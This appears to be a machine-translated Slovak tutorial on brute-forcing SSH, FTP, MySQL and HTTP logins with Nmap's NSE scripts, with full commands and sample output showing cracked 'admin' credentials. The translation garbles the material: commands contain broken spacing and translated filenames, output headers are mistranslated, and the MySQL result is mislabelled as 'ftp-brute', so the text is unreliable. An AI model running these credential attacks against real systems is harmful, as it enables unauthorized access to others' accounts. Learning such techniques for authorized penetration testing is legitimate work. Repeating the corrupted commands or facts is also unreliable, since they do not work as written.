Nmap

Vynútenie brutálneho hesla pomocou Nmap

Vynútenie brutálneho hesla pomocou Nmap
Na brutálne použitie online služieb ľudia bežne používajú systémy Hydra, Medusa a Metasploit Framework, ale Nmap sa dá použiť aj na brutálne použitie mnohých online služieb. Existujú zabudované skripty Nmap, ktoré podporujú FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP a ďalšie rôzne služby. Môžete tiež hrubou silou vynútiť autentifikačné metódy založené na formulároch, základných formulároch a súhrne. Ak máte nainštalovaný Nmap, môžete tieto skripty vidieť v adresári „/ usr / share / nmap / scripts“.

[chránené e-mailom]: ~ $ sudo apt aktualizácia && sudo apt aktualizácia
[chránené e-mailom]: ~ $ sudo apt install nmap -y
[chránené e-mailom]: ~ $ cd / usr / share / nmap / scripts /
[chránené e-mailom]: ~ $ ls * brutálny *

V tomto tutoriále preskúmame, ako môžeme použiť Nmap na útok hrubou silou.

SSH Brute-Force

SSH je bezpečný protokol vzdialenej správy a podporuje autentifikáciu založenú na openssl a hesle. Na overenie pomocou hesla SSH pomocou brute-force môžeme použiť „ssh-brute.skript NmE.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brutálny.nse

Odošlite zoznam používateľských mien a hesiel ako argument spoločnosti Nmap.

[chránené e-mailom]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = používatelia.txt, passdb = heslá.TXT
Spustenie Nmapu 7.70 (https: // nmap.org) o 2020-02-08 17:09 PKT
Správa o skenovaní Nmap pre 192.168.43.181
Hostiteľ je hore (0.Latencia 00033 s).
SLUŽBA PRÍSTAVNÉHO ŠTÁTU
22 / tcp otvorené ssh
| ssh-brute:
| Účty:
| admin: p4ssw0rd - platné poverenia
| _ Štatistiky: Vykonané 99 odhadov za 60 sekúnd, priemerné tps: 1.7
Nmap hotovo: 1 IP adresa (1 hostiteľ hore) naskenovaná za 60.17 sekúnd

FTP Brute-Force

FTP je protokol na prenos súborov, ktorý podporuje autentifikáciu založenú na hesle. Na hrubou silou FTP použijeme „ftp-brute.skript NmE.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brutal.nse

Odošlite zoznam používateľských mien a hesiel ako argument spoločnosti Nmap.

[chránené e-mailom]: ~ $ nmap --script ftp-brute -p21 192.168.43.181 --script-args
userdb = používatelia.txt, passdb = heslá.TXT
Spustenie Nmapu 7.70 (https: // nmap.org) o 2020-02-08 16:51 PKT
Správa o skenovaní Nmap pre 192.168.43.181
Hostiteľ je hore (0.Latencia 00021s).
SLUŽBA PRÍSTAVNÉHO ŠTÁTU
21 / tcp otvorené ftp
| ftp-brute:
| Účty:
| admin: p4ssw0rd - platné poverenia
| _ Štatistiky: Vykonané 99 odhadov za 20 sekúnd, priemerné tps: 5.0
Nmap hotovo: 1 IP adresa (1 hostiteľ hore) naskenovaná v 19.50 sekúnd

MYSQL Brute-Force

Niekedy je MySQL ponechaný otvorený vonkajším pripojením a umožňuje komukoľvek sa k nemu pripojiť. Jeho heslo je možné prelomiť pomocou Nmapu so skriptom „mysql-brute“.

[chránené e-mailom]: ~ $ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb = používatelia.txt, passdb = heslá.TXT
Spustenie Nmapu 7.70 (https: // nmap.org) o 2020-02-08 16:51 PKT
Správa o skenovaní Nmap pre 192.168.43.181
Hostiteľ je hore (0.Latencia 00021s).
SLUŽBA PRÍSTAVNÉHO ŠTÁTU
3306 / tcp otvorený mysql
| ftp-brute:
| Účty:
| admin: p4ssw0rd - platné poverenia
| _ Štatistiky: Vykonané 99 odhadov za 20 sekúnd, priemerné tps: 5.0
Nmap hotovo: 1 IP adresa (1 hostiteľ hore) naskenovaná v 19.40 sekúnd

HTTP Brute-Force

Protokol HTTP používa na autentifikáciu používateľov na webové servery tri typy autentifikácie. Tieto metodiky sa používajú v smerovačoch, modemoch a pokročilých webových aplikáciách na výmenu používateľských mien a hesiel. Jedná sa o tieto typy:

Základné overenie

V základnom autentifikačnom protokole HTTP prehľadávač kóduje užívateľské meno a heslo pomocou base64 a odošle ho pod hlavičku „Autorizácia“. Môžete to vidieť na nasledujúcej snímke obrazovky.

Autorizácia: Základné YWRtaW46YWRtaW4 =

Tento reťazec môžete dekódovať pomocou base64, aby ste videli užívateľské meno a heslo

[chránené e-mailom]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
admin: admin

Základné overenie HTTP je nezabezpečené, pretože odosiela používateľské meno aj heslo ako obyčajný text. Každý útočník typu Man-in-the-Middle môže ľahko zachytiť prenos a dekódovať reťazec, aby získal heslo.

Overenie súhrnu

HTTP Digest Authentication používa hašovacie techniky na zašifrovanie užívateľského mena a hesla pred jeho odoslaním na server.

Hash1 = MD5 (používateľské meno: sféra: heslo)
Hash2 = MD5 (metóda: digestURI)
response = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Tieto hodnoty vidíte pod hlavičkou Autorizácia.

Autentifikácia založená na súhrne je bezpečná, pretože heslo sa neposiela ako čistý text. Ak útočník typu Man-in-the-Middle zachytí prenos, nebude môcť získať heslo vo formáte obyčajného textu.

Overovanie na základe formulára

Základné a Digest autentifikácie podporujú iba prenos užívateľského mena a hesla, zatiaľ čo autentifikáciu založenú na formulári je možné prispôsobiť podľa potrieb používateľa. Môžete si vytvoriť svoju vlastnú webovú stránku v formáte HTML alebo JavaScript, aby ste mohli použiť svoje vlastné techniky kódovania a prenosu.

Dáta vo formálnom overovaní na základe formulára sa zvyčajne odosielajú ako obyčajný text. Z bezpečnostných dôvodov je potrebné použiť HTTP, aby sa zabránilo útokom typu Man-in-the-Middle.

Pomocou Nmap môžeme brutálne vynútiť všetky typy autentifikácie HTTP. Na tento účel použijeme skript „http-brute“.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-brute.nse

Ak chcete otestovať tento skript Nmap, vyriešime verejne hostenú výzvu hrubou silou od pentesterovej akadémie na tejto adrese URL http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Ako argument skriptu musíme uviesť všetko vrátane názvu hostiteľa, URI, metódy požiadavky a slovníkov osobitne.

[chránené e-mailom]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.hostname = pentesteracademylab.appspot.com,
http-brute.cesta = / lab / webapp / basicauth, userdb = používatelia.txt, passdb = heslá.TXT,
http-brute.metóda = POST
 
Spustenie Nmapu 7.70 (https: // nmap.org) o 2020-02-08 21:37 PKT
Správa o skenovaní Nmap pre pentesteracademylab.appspot.com (216.58.210.84)
Hostiteľ je hore (0.Latencia 20 s).
Ďalšie adresy pre pentesteracademylab.appspot.com (nenaskenované): 2a00: 1450: 4018: 803 :: 2014
záznam rDNS pre 216.58.210.84: mct01s06-in-f84.1e100.sieť
 
SLUŽBA PRÍSTAVNÉHO ŠTÁTU
80 / tcp otvorený http
| http-brute:
| Účty:
| admin: aaddd - platné poverenia
| _ Štatistiky: Vykonané 165 odhadov za 29 sekúnd, priemerné tps: 5.3
Nmap hotovo: 1 IP adresa (1 hostiteľ hore) naskenovaná za 31.22 sekúnd

Záver

Nmap je možné použiť na vykonávanie mnohých vecí napriek jednoduchému skenovaniu portov. Môže nahradiť Metasploit, Hydra, Medusa a množstvo ďalších nástrojov vyrobených špeciálne pre online brutálne vynútenie. Nmap má jednoduché a ľahko použiteľné zabudované skripty, ktoré hrubou silou takmer všetky služby vrátane HTTP, TELNEL, SSH, MySQL, Samba a ďalších.

Ako zmeniť ľavé a pravé tlačidlo myši na počítači so systémom Windows 10
Je úplnou normou, že všetky zariadenia počítačových myší sú ergonomicky navrhnuté pre pravákov. Existujú však dostupné myšacie zariadenia, ktoré sú šp...
Napodobňovanie kliknutí myšou vznášaním sa pomocou myši bez myši vo Windows 10
Používanie myši alebo klávesnice v nesprávnom postoji k nadmernému používaniu môže mať za následok veľa zdravotných problémov vrátane napätia, syndróm...
Pridajte gestá myši do systému Windows 10 pomocou týchto bezplatných nástrojov
V posledných rokoch sa počítače a operačné systémy veľmi vyvinuli. Boli časy, keď používatelia museli prechádzať správcami súborov pomocou príkazov. R...